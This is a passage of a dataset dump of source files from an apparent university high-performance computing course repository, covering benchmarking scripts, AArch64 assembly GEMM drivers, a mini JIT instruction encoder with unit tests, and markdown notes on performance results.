"38793eb1e5912611736ff3a66ec09215e802f05a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1583, "license_type": "no_license", "max_line_length": 126, "num_lines": 44, "path": "/exercise_1/vis.py", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport subprocess\n\nbenchmarks = [\"peak_asimd_scalar_sp\", \"peak_asimd_scalar_dp\", \"peak_asimd_simd_sp\", \"peak_asimd_simd_dp\"]\n\nplt.figure()\nfor benchmark in benchmarks:\n print(benchmark)\n data_cores = []\n data_threads = []\n for i in range(1, 33):\n print(f\"Cores: {i}\")\n worker_string = \"S0:1GB:\" + str(i)\n benchmark_results = subprocess.run([\"likwid-bench\", \"-t\", benchmark, \"-w\", worker_string],\n capture_output=True).stdout\n splitted_string = str(benchmark_results).split('\\\\n')\n flops = 0\n for string in splitted_string:\n if string.startswith(\"MFlops/s:\"):\n flops = float(string.split(\"\\\\t\")[-1])\n break\n print((i, flops))\n data_cores.append((i, flops)) \n \n benchmark_results = subprocess.run([\"likwid-pin\", \"-c\", \"S0:0\", \"likwid-bench\", \"-t\", benchmark, \"-w\", worker_string],\n capture_output=True).stdout\n splitted_string = str(benchmark_results).split('\\\\n')\n flops = 0\n for string in splitted_string:\n if string.startswith(\"MFlops/s:\"):\n flops = float(string.split(\"\\\\t\")[-1])\n break\n print((i, flops))\n data_threads.append((i, flops))\n \n plt.scatter(*zip(*data_cores), label=\"cores \" + benchmark)\n plt.scatter(*zip(*data_threads), label=\"Threads \" + benchmark)\n \n\nplt.ylabel(\"MFLOP/s\")\n\nplt.xlabel(\"No. of cores/threads\") \nplt.legend()\nplt.savefig(\"benchmark.png\")\n" }, { "alpha_fraction": 0.3577863574028015, "alphanum_fraction": 0.43500643968582153, "avg_line_length": 21.852941513061523, "blob_id": "13faf3bb0fe7d753ec1152d0640c194463259efc", "content_id": "cae68fec41b6c466a283ca5fac925eb45b805b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 777, "license_type": "no_license", "max_line_length": 116, "num_lines": 34, "path": "/exercise_5/task4/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <iostream>\n\n\nextern \"C\" \n{\nvoid gemm_asm_gp( uint32_t const * i_a,\n uint32_t const * i_b,\n uint32_t * io_c );\n\n}\n\nint main()\n{\n\n uint32_t a[8] = {1, 2, 3, 5, 7, 11, 13, 17};\n uint32_t b[4] = {1, 2, 3, 4};\n uint32_t c[8] = {1, 2, 3, 4, 5, 6, 7, 8};\n \n //NOTE more unit tests would be better but ... better than nothing\n uint32_t c_res[8] = {16, 26, 32, 43, 36, 56, 68, 91};\n \n gemm_asm_gp(a, b, c);\n \n std::cout << \"Comparing results... 
\" << std::endl;\n for (int i = 0; i < 8; ++i)\n {\n if (c[i] != c_res[i])\n {\n std::cout << \"Found mismatch at index \" << i << \" c:\" << c[i] << \" != c_res:\" << c_res[i] << std::endl; \n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6625824570655823, "alphanum_fraction": 0.7257304191589355, "avg_line_length": 49.52381134033203, "blob_id": "3aa578038cbf1c2fedf21bc0dbb1a67ff988f7f7", "content_id": "3bde721ea193bf1633755b4a2828cacdd86a0d10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1061, "license_type": "no_license", "max_line_length": 348, "num_lines": 21, "path": "/exercise_6/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# Optimizations\n\n## Baseline\n\nThe baseline approach is roughly the idea from the lecture. With this I achieved a performance of 20.30 GFLOPS.\n\n## No stack usage\n\nAs a first optimization stack I got ride of the stack usage. This meant, that I reordered the register usages. After this it was not necessary to save registers d8 to d15 (and the x registers) on the stack, saving store and load operations.\nThis increased the performance to 24.36 GFLOPS\n\n## Opposite store\n\nAs a final optimization step I tried to reorder the write back of the Matrix C to get ride of the first sub operation. That meant I stored the last column first then the second-last and so one. However, I gained no further performance boost. Instead compared to the non stack usage variant my performance dropped to 23.25 GFLOPS so I reverted back.\n\n# Best performing solutions\n\nName | time (s) | #executions | GFLOPS | %peak\n----------------------------------------------\nMarkus' ASM (16x4x4) | 2.10127 | 100000000 | 24.36 | 60.9\nMarkus' ASM (16x4x12) | 4.6028 | 100000000 | 33.37 | 83.4\n" }, { "alpha_fraction": 0.6076732873916626, "alphanum_fraction": 0.6608911156654358, "avg_line_length": 88.22222137451172, "blob_id": "f232daf9b69dfad393d0b1cf4b23a6509979ee6f", "content_id": "e2350759818391a269507338075c861cc268122e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 808, "license_type": "no_license", "max_line_length": 201, "num_lines": 9, "path": "/exercise_6/Makefile", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "BUILD_DIR = ./build\n\ngemm_asm_asmid: driver.cpp ../exercise_4/src/gemm_ref.cpp ../exercise_4/src/util.cpp gemm_asm_asimd_16_4_4.s gemm_asm_asimd_16_4_12.s\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/gemm_ref.cpp -o ${BUILD_DIR}/gemm_ref.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 -c ../exercise_4/src/util.cpp -o ${BUILD_DIR}/util.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_16_4_4.s -o ${BUILD_DIR}/gemm_asm_asimd_16_4_4.o\n\t\tgcc -g -pedantic -Wall -Wextra -Werror -c gemm_asm_asimd_16_4_12.s -o ${BUILD_DIR}/gemm_asm_asimd_16_4_12.o\n\t\tg++ -g -pedantic -Wall -Wextra -Werror -O2 driver.cpp ${BUILD_DIR}/gemm_ref.o ${BUILD_DIR}/util.o ${BUILD_DIR}/gemm_asm_asimd_16_4_4.o ${BUILD_DIR}/gemm_asm_asimd_16_4_12.o -o ${BUILD_DIR}/driver \n$(shell mkdir -p build)\n \n" }, { "alpha_fraction": 0.6374269127845764, "alphanum_fraction": 0.6432748436927795, "avg_line_length": 18.037036895751953, "blob_id": "887f22e0e4e4551a47641c0cf8ac7b91cf5512cf", "content_id": "3b60c15d3070e22fbb76718a9ffae6fdefe1c6dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 513, "license_type": "no_license", 
"max_line_length": 75, "num_lines": 27, "path": "/exercise_9/mini_jit_base/src/generators/Simple.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_SIMPLE_H\n#define MINI_JIT_GENERATORS_SIMPLE_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class Simple;\n }\n}\n\nclass mini_jit::generators::Simple {\n private:\n //! kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a simple kernel which sets the value three to register w0.\n *\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate() )();\n};\n\n#endif" }, { "alpha_fraction": 0.4201570749282837, "alphanum_fraction": 0.4378272294998169, "avg_line_length": 27.314815521240234, "blob_id": "904285df6dfd5a653c92a93b79fd37d9869929a2", "content_id": "5687a35abc0b6b522ed069a2055514b1237431f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 80, "num_lines": 54, "path": "/exercise_9/mini_jit_base/src/generators/Loop.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Loop.h\"\n\nuint32_t ( *mini_jit::generators::Loop::generate( uint32_t i_nIterations ) )() {\n uint32_t l_ins = 0;\n\n // init output\n l_ins = instructions::Base::dpMovImm( 0,\n 0,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // set loop counter\n l_ins = instructions::Base::dpMovImm( 1,\n i_nIterations,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // reset offset\n m_kernel.resetOffset();\n\n // increase output\n l_ins = instructions::Base::dpAddImm( 0,\n 0,\n 1,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // decrease loop-counter\n l_ins = instructions::Base::dpSubImm( 1,\n 1,\n 1,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n // loop if required\n int32_t l_jumpPc = -m_kernel.getOffset() / 4;\n l_ins = instructions::Base::bCbnz( 1,\n l_jumpPc,\n 0 );\n m_kernel.addInstruction( l_ins );\n\n\n // ret\n l_ins = instructions::Base::bRet();\n m_kernel.addInstruction( l_ins );\n\n // we might debug through file-io\n std::string l_file = \"loop.bin\";\n m_kernel.write( l_file.c_str() );\n\n m_kernel.setKernel();\n\n return (uint32_t (*)()) m_kernel.getKernel();\n}" }, { "alpha_fraction": 0.4536760449409485, "alphanum_fraction": 0.4704124331474304, "avg_line_length": 22.25, "blob_id": "e1ceeba6d26df558a7676ccd2370119475c4c255", "content_id": "d25803befec1c6e367578edb42677a7eb425358d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 122, "num_lines": 72, "path": "/exercise_8/triad.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\"\n{\n void triad_low( uint64_t i_nValues,\n float const * i_a,\n float const * i_b,\n float * o_c );\n\n}\n\nvoid triad_high( uint64_t i_nValues,\n float const * i_a,\n float const * i_b,\n float * o_c ) {\n for( uint64_t l_va = 0; l_va < i_nValues; l_va++ ) {\n o_c[l_va] = i_a[l_va] + 2.0f * i_b[l_va];\n }\n}\n\nint main(int argc, char** argv)\n{\n if (argc != 2)\n {\n std::cerr << \"Usage: \" << argv[0] << \" nValues\" << std::endl;\n return 0;\n }\n \n uint64_t n_values = atoi(argv[1]);\n\n //allocate Memory\n float* a = new float[n_values];\n float* b = new float[n_values];\n float* c_low = new float[n_values];\n float* c_high = new 
float[n_values];\n\n //fill a and b with values\n for (uint64_t i = 0; i < n_values; i++)\n {\n a[i] = i;\n b[i] = i % 10;\n }\n\n //run triad\n triad_high(n_values, a, b, c_high);\n\n triad_low(n_values, a, b, c_low);\n\n //compare results\n float max_diff = 0;\n for (uint64_t i = 0; i < n_values; i++)\n {\n max_diff = std::max(max_diff, std::abs(c_low[i] - c_high[i]));\n }\n \n if (max_diff < 10e-6)\n {\n std::cout << \"Compared \" << n_values << \" values and triad_high and triad_low had same results\" << std::endl;\n }\n else\n {\n std::cout << \"Compared \" << n_values << \" values and triad_high and triad_low had different results\" << std::endl;\n }\n\n delete[] a;\n delete[] b;\n delete[] c_low;\n delete[] c_high;\n\n return 0;\n}" }, { "alpha_fraction": 0.3558848202228546, "alphanum_fraction": 0.4112384617328644, "avg_line_length": 28.808332443237305, "blob_id": "c91c697c86993fd7d23d7da46236e4d25990bb3d", "content_id": "80767a122ec5f527233191b4b23dd3f8148106aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3577, "license_type": "no_license", "max_line_length": 87, "num_lines": 120, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Asimd.h\"\n\nuint32_t mini_jit::instructions::Asimd::lsLdrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 ) {\n uint32_t l_ins = 0x3D400000;\n\n l_ins |= 0x1f & i_regSimdDes;\n l_ins |= (0x1f & i_regGpAddr) << 5;\n l_ins |= (0xfff & i_imm12) << 10;\n\n uint8_t l_opc = 0b01;\n if( i_regSize == regsize_t::q ) {\n l_opc = 0b11;\n }\n l_ins |= l_opc << 22;\n\n uint8_t l_size = 0;\n if( i_regSize == regsize_t::h ) {\n l_size = 0b01;\n }\n else if( i_regSize == regsize_t::s ) {\n l_size = 0b10;\n }\n else if( i_regSize == regsize_t::d ) {\n l_size = 0b11;\n }\n l_ins |= l_size << 30;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsStrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 ) {\n uint32_t l_ins = lsLdrImmUnsOff( i_regSimdDes,\n i_regGpAddr,\n i_regSize,\n i_imm12 );\n l_ins &= ~(0b1 << 22);\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsLd1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures ) {\n uint32_t l_ins = 0xC402000;\n\n l_ins |= 0x1f & i_regSimdDes;\n l_ins |= (0x1f & i_regGpAddr) << 5;\n\n if( i_arrSpec == arrspec_t::s2 ) {\n l_ins |= 0b10 << 10;\n l_ins |= 0b0 << 30;\n }\n else if( i_arrSpec == arrspec_t::s4 ) {\n l_ins |= 0b10 << 10;\n l_ins |= 0b1 << 30;\n }\n else if( i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0b11 << 10;\n l_ins |= 0b1 << 30;\n }\n\n uint8_t l_opCode = 0;\n if( i_nStructures == 1 ) {\n l_opCode = 0b0111;\n }\n else if( i_nStructures == 2 ) {\n l_opCode = 0b1010;\n }\n else if( i_nStructures == 3 ) {\n l_opCode = 0b0110;\n }\n else {\n l_opCode = 0b0010;\n }\n l_ins |= l_opCode << 12;\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::lsSt1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures ) {\n uint32_t l_ins = lsLd1MultipleNoOff( i_regSimdDes,\n i_regGpAddr,\n i_arrSpec,\n i_nStructures );\n l_ins &= ~(0b1 << 22);\n\n return l_ins;\n}\n\nuint32_t mini_jit::instructions::Asimd::dpFmovVectorImm( uint8_t i_regSimdDes,\n uint8_t i_imm8,\n arrspec_t i_arrSpec ) {\n uint32_t l_ins = 0xf00f400;\n\n l_ins |= 0x1f & 
i_regSimdDes;\n\n // set a, b, c\n l_ins |= (0b111 & (i_imm8 >> 5)) << 16;\n // set d, e, f, g, h\n l_ins |= (0b11111 & i_imm8) << 5;\n\n if( i_arrSpec == arrspec_t::s4 || i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0x1 << 30;\n }\n if( i_arrSpec == arrspec_t::d2 ) {\n l_ins |= 0x1 << 29;\n }\n\n return l_ins;\n}\n" }, { "alpha_fraction": 0.5174376964569092, "alphanum_fraction": 0.5238434076309204, "avg_line_length": 32.4523811340332, "blob_id": "a5d8d0a8e03be732c9005d56494e575748cc0d4f", "content_id": "5c47b4205ee291f048125468dfe5dcd7c406509a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1405, "license_type": "no_license", "max_line_length": 64, "num_lines": 42, "path": "/exercise_9/mini_jit_base/src/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include \"generators/Simple.h\"\n#include \"generators/Loop.h\"\n#include \"generators/MyExample.h\"\n\nint main() {\n std::cout << \"###########################\" << std::endl;\n std::cout << \"### welcome to mini_jit ###\" << std::endl;\n std::cout << \"###########################\" << std::endl;\n\n std::cout << \"simple:\" << std::endl;\n std::cout << \" generating simple kernel\" << std::endl;\n mini_jit::generators::Simple l_simple;\n uint32_t (* l_funcSimple)() = l_simple.generate();\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcSimple() << std::endl;\n\n\n std::cout << \"loop:\" << std::endl;\n std::cout << \" generating\" << std::endl;\n mini_jit::generators::Loop l_loop;\n uint32_t (* l_funcLoop)() = l_loop.generate( 32 );\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcLoop() << std::endl;\n\n std::cout << \"MyExample (factorial):\" << std::endl;\n std::cout << \" generating\" << std::endl;\n mini_jit::generators::MyExample l_myExample;\n uint32_t (* l_funcMyExample)() = l_myExample.generate( 4 );\n\n std::cout << \" running\" << std::endl;\n std::cout << \" result: \" << l_funcMyExample() << std::endl;\n\n\n std::cout << \"##############################\" << std::endl;\n std::cout << \"### mini_jit says bye, bye ###\" << std::endl;\n std::cout << \"##############################\" << std::endl;\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.5385255217552185, "alphanum_fraction": 0.5557095408439636, "avg_line_length": 33.69230651855469, "blob_id": "29b7186fde0449cc4863af3c17ae70a98f301de1", "content_id": "6e064cabd14ebe9ac5d002e539aebd6dcd408a2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3608, "license_type": "no_license", "max_line_length": 99, "num_lines": 104, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_INSTRUCTIONS_ASIMD_H\n#define MINI_JIT_INSTRUCTIONS_ASIMD_H\n\n#include <cstdint>\n\nnamespace mini_jit {\n namespace instructions {\n class Asimd;\n }\n}\n\nclass mini_jit::instructions::Asimd {\n public:\n //! arrangement specifiers\n enum arrspec_t: char {\n s2 = 0,\n s4 = 1,\n d2 = 2\n };\n\n //! 
register sizes\n enum regsize_t: char {\n b = 0,\n h = 1,\n s = 2,\n d = 3,\n q = 4\n };\n\n /**\n * Gets the machine code for load SIMD&FP register (immediate offset, unsigned offset)\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address from which data is loaded.\n * @param i_regSize size of of register to which data is loaded.\n * @param i_imm12 value of the 12-bit immediate.\n *\n * @return instruction.\n **/\n static uint32_t lsLdrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 );\n\n /**\n * Gets the machine code for store SIMD&FP register (immediate offset, unsigned offset)\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address to which the data is stored.\n * @param i_regSize size of register whose data is stored.\n * @param i_imm12 value of the 12-bit immediate.\n *\n * @return instruction.\n **/\n static uint32_t lsStrImmUnsOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n regsize_t i_regSize,\n uint16_t i_imm12 );\n\n /**\n * Gets the machine code for load multiple structures (no offset).\n *\n * @param i_regSimdDes first or only SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address from which data is loaded.\n * @param i_arrSpec arrangement specifier.\n * @param i_nStructures number of structures which are loaded. 1, 2, 3 or 4.\n *\n * @return instruction.\n **/\n static uint32_t lsLd1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures );\n\n /**\n * Gets the machine code for store multiple structures (no offset).\n *\n * @param i_regSimdDes first or only SIMD&FP destination register.\n * @param i_regGpAddr general purpose register holding the address to where the data is stored.\n * @param i_arrSpec arrangement specifier.\n * @param i_nStructures number of structures which are stored. 
1, 2, 3 or 4.\n *\n * @return instruction.\n **/\n static uint32_t lsSt1MultipleNoOff( uint8_t i_regSimdDes,\n uint8_t i_regGpAddr,\n arrspec_t i_arrSpec,\n uint8_t i_nStructures );\n\n /**\n * Gets the machine code for floating-point move immediate (vector).\n *\n * @param i_regSimdDes SIMD&FP destination register.\n * @param i_imm8 value of the 8-bit immediate.\n * @param i_arrSpec arrangement specifier.\n *\n * @return instruction.\n **/\n static uint32_t dpFmovVectorImm( uint8_t i_regSimdDes,\n uint8_t i_imm8,\n arrspec_t i_arrSpec );\n};\n\n#endif\n" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.496515691280365, "avg_line_length": 25.090909957885742, "blob_id": "ec0ef9a136905599c81c62f724f1ed0381c7e76b", "content_id": "ae6cd66667dfa704405bb05991dbab1c84fb4a13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 574, "license_type": "no_license", "max_line_length": 61, "num_lines": 22, "path": "/exercise_5/task1/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nextern \"C\" {\n int32_t load_store_0( int32_t const * i_a);\n void load_store_1( uint64_t const * i_a, uint64_t * o_b);\n void load_store_2( int64_t const * i_a, int64_t * o_b);\n void load_store_3();\n}\n\nint main(int i_argc, char * i_argv[])\n{\n // first example\n int32_t l_data0 = 7743;\n int32_t * l_ptr0 = &l_data0;\n \n std::cout << \"l_data0 / l_ptr0 / return value: \"\n << l_data0 << \" / \"\n << l_ptr0 << \" / \"\n << load_store_0( l_ptr0 )\n << std::endl;\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.7581903338432312, "alphanum_fraction": 0.7737909555435181, "avg_line_length": 52.25, "blob_id": "a03132c12ed1215d0cfb334be7444f7b5fd724e8", "content_id": "efc2b40598cbc52961aa97ac8dde5ba0a5c20296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 641, "license_type": "no_license", "max_line_length": 206, "num_lines": 12, "path": "/exercise_4/solution_4_4.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "## Explain the call\n\nThe call of libxsmm_dmmdispatch dispatches the just in time code generation. It returns a function pointer to an optimized, generated kernel. With the call of the kernel the optimized code gets executed. \n\n## Compile \n\ng++ -O3 -DNDEBUG -I/home/markus/lib/libxsmm/include src/driver_4_4.cpp src/gemm_ref.cpp src/util.cpp -pthread -lxsmm -L${HOME}/lib/libxsmm/lib /lib64/libopenblas.so.0 -ldl -o driver_4_4\n\n\n## Performance\n\nCompared with our reference kernel implementation the libxsmm implementation performs significantly better. We get at least ten times the number of FLOPS with a peak performance of ~32 GFLOPS. 
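For illustration, the dispatch-then-call pattern looks roughly like the sketch below. It follows libxsmm's documented libxsmm_dmmdispatch interface; the 32x32x32 shape, the NULL defaults for leading dimensions, flags and prefetch, and the function name gemm_jit are assumptions for this example, not a copy of our driver.

```cpp
#include <libxsmm.h>

// Dispatch once (JIT code generation), then call the returned kernel.
void gemm_jit(const double* a, const double* b, double* c) {
  const libxsmm_blasint m = 32, n = 32, k = 32;
  const double alpha = 1.0, beta = 1.0;  // C += A * B
  libxsmm_dmmfunction kernel = libxsmm_dmmdispatch(
      m, n, k,
      NULL, NULL, NULL,                  // lda, ldb, ldc: tight defaults
      &alpha, &beta,
      NULL, NULL);                       // flags, prefetch: library defaults
  if (kernel != NULL) {
    kernel(a, b, c);                     // executes the generated GEMM
  }
}
```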
\n" }, { "alpha_fraction": 0.4806629717350006, "alphanum_fraction": 0.4806629717350006, "avg_line_length": 24.85714340209961, "blob_id": "81b8851b989604307ebc65619737e6b2aeaf8b3e", "content_id": "c3e4a1b8abb46a2265bb51357f8f62536d9e1b86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 362, "license_type": "no_license", "max_line_length": 34, "num_lines": 14, "path": "/exercise_4/src/gemm_ref.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef GEMM_REF_HPP\n#define GEMM_REF_HPP\n\nvoid gemm_ref(float const* i_a,\n float const* i_b,\n float * io_c,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_k,\n unsigned int i_lda,\n unsigned int i_ldb,\n unsigned int i_ldc);\n\n#endif //GEMM_REF_HPP\n" }, { "alpha_fraction": 0.3549405336380005, "alphanum_fraction": 0.4078660011291504, "avg_line_length": 43.7717399597168, "blob_id": "65a93c0213f8619bc1e3b54456028e36513876db", "content_id": "0be1077c4876add82e8e906be53e280a14f4e6b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4119, "license_type": "no_license", "max_line_length": 95, "num_lines": 92, "path": "/exercise_9/mini_jit_base/src/instructions/Asimd.test.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <catch2/catch.hpp>\n#include \"Asimd.h\"\n\nTEST_CASE( \"Tests lsLdrImmUnsOff.\", \"[Asimd][lsLdrImmUnsOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::regsize_t l_rs = mini_jit::instructions::Asimd::regsize_t::b;\n l_ins = mini_jit::instructions::Asimd::lsLdrImmUnsOff( 0,\n 0,\n l_rs,\n 0 );\n REQUIRE( l_ins == 0x3d400000 );\n\n l_rs = mini_jit::instructions::Asimd::regsize_t::q;\n l_ins = mini_jit::instructions::Asimd::lsLdrImmUnsOff( 2,\n 4,\n l_rs,\n 32 );\n REQUIRE( l_ins == 0x3dc08082 );\n}\n\nTEST_CASE( \"Tests lsStrImmUnsOff.\", \"[Asimd][lsStrImmUnsOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::regsize_t l_rs = mini_jit::instructions::Asimd::regsize_t::s;\n l_ins = mini_jit::instructions::Asimd::lsStrImmUnsOff( 1,\n 0,\n l_rs,\n 64 );\n REQUIRE( l_ins == 0xbd010001 );\n}\n\nTEST_CASE( \"Tests lsLd1MultipleNoOff.\", \"[Asimd][lsLd1MultipleNoOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s4;\n\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 0,\n 0,\n l_as,\n 4 );\n REQUIRE( l_ins == 0x4c402800 );\n\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 3,\n 7,\n l_as,\n 2 );\n REQUIRE( l_ins == 0x4c40a8e3 );\n\n l_as = mini_jit::instructions::Asimd::arrspec_t::d2;\n l_ins = mini_jit::instructions::Asimd::lsLd1MultipleNoOff( 9,\n 2,\n l_as,\n 1 );\n REQUIRE( l_ins == 0x4c407c49 );\n}\n\nTEST_CASE( \"Tests lsSt1MultipleNoOff.\", \"[Asimd][lsLd1MultipleNoOff]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s2;\n l_ins = mini_jit::instructions::Asimd::lsSt1MultipleNoOff( 2,\n 5,\n l_as,\n 3 );\n REQUIRE( l_ins == 0x0c0068a2 );\n}\n\nTEST_CASE( \"Tests dpFmovVectorImm.\", \"[Asimd][dpFmovVectorImm]\" ) {\n uint32_t l_ins = 0;\n mini_jit::instructions::Asimd::arrspec_t l_as = mini_jit::instructions::Asimd::arrspec_t::s4;\n\n // fmov\tv0.4s, #2.000000000000000000e+00\n uint8_t l_imm = 0;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 0,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x4f00f400 );\n\n // fmov\tv5.2d, #-2.000000000000000000e+00\n 
l_imm = 0b10000000;\n l_as = mini_jit::instructions::Asimd::arrspec_t::d2;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 5,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x6f04f405 );\n\n // fmov\tv17.2s, #1.000000000000000000e+00\n l_imm = 0b01110000;\n l_as = mini_jit::instructions::Asimd::arrspec_t::s2;\n l_ins = mini_jit::instructions::Asimd::dpFmovVectorImm( 17,\n l_imm,\n l_as );\n REQUIRE( l_ins == 0x0f03f611 );\n\n}\n" }, { "alpha_fraction": 0.46840083599090576, "alphanum_fraction": 0.5661662220954895, "avg_line_length": 44.11023712158203, "blob_id": "67a0f468fde08c97630ac41a3276e2504325b3d3", "content_id": "7df346bb9ec88d6e5488b650a413adc94f5e5aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5728, "license_type": "no_license", "max_line_length": 158, "num_lines": 127, "path": "/exercise_2/exercise.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "//\n// Created by markus on 4/22/21.\n//\n#include <iostream>\n#include <bitset>\n\nunsigned int instruction_asimd_compute( unsigned int i_vec_instr,\n unsigned char i_vec_reg_dst,\n unsigned char i_vec_reg_src_0,\n unsigned char i_vec_reg_src_1 );\n\nint main()\n{\n std::cout << \"bit patterns\" << std::endl << \"#############\" << std::endl;\n unsigned char l_data1 = 1;\n std::cout << \"unsigned char l_data1 = 1: \" << std::bitset<8>(l_data1) << std::endl;\n\n unsigned char l_data2 = 255;\n std::cout << \"unsigned char l_data2 = 255: \" << std::bitset<8>(l_data2) << std::endl;\n\n unsigned char l_data3 = l_data2 + 1;\n std::cout << \"unsigned char l_data3 = l_data2 + 1:\" << std::bitset<8>(l_data3) << std::endl;\n\n unsigned char l_data4 = 0xA1;\n std::cout << \"unsigned char l_data4 = 0xA1: \" << std::bitset<8>(l_data4) << std::endl;\n\n unsigned char l_data5 = 0b1001011;\n std::cout << \"unsigned char l_data5 = 0b1001011: \" << std::bitset<8>(l_data5) << std::endl;\n\n unsigned char l_data6 = 'H';\n std::cout << \"unsigned char l_data6 = 'H': \" << std::bitset<8>(l_data6) << std::endl;\n\n char l_data7 = -4;\n std::cout << \"char l_data7 = -4: \" << std::bitset<8>(l_data7) << std::endl;\n\n unsigned int l_data8 = 1u << 11;\n std::cout << \"unsigned int l_data8 = 1u << 11: \" << std::bitset<32>(l_data8) << std::endl;\n\n unsigned int l_data9 = l_data8 << 21;\n std::cout << \"unsigned int l_data9 = l_data8 << 21: \" << std::bitset<32>(l_data9) << std::endl;\n\n unsigned int l_data10 = 0xFFFFFFFF >> 5;\n std::cout << \"unsigned int l_data10 = 0xFFFFFFFF >> 5: \" << 